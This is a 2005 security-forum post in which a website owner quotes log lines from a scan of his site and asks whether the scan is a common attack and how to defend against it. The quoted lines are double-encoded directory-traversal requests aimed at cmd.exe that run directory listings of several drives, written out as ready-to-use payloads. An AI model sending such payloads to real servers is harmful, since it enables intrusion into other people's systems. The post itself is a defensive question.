mickers
Newbie
Posts: 1
|
 |
Log of Search for cmd.exe
« on: Sep 10th, 2005, 3:00pm » |
 Quote  Modify
|
Hi,
Yesterday I had someone (I have the IP address but I'm not listing it here) scan my website for cmd.exe.
The number of lines (116) is too long for this forum but here a re a few of them:
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+d:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+e:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+f:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+g:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+d:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+e:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+f:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+g:\
and so on.
What the rest of the lines contain are different paths and the c, d, e, f, g sequence at the end of the line.
Typically is this person trying to find cmd.exe just to find files with important information like passwords or credit cards or are they looking to execute applications by the use of cmd.exe?
Is this a common attack and is there a good protection for it?
I appreciate all help and input.
--
Michael
21st Century Technologies, Inc.
http://www.21stsoft.com
"Any sufficiently advanced technology is indistinguishable from magic."
Arthur C. Clark, The Lost Worlds of 2001
-------------------------------------------
|
|
 IP Logged |
|
|
|
Mischel Internet Security Forum
Reply
Notify of replies
Send Topic
Print
Author
Search
Members
Login
Register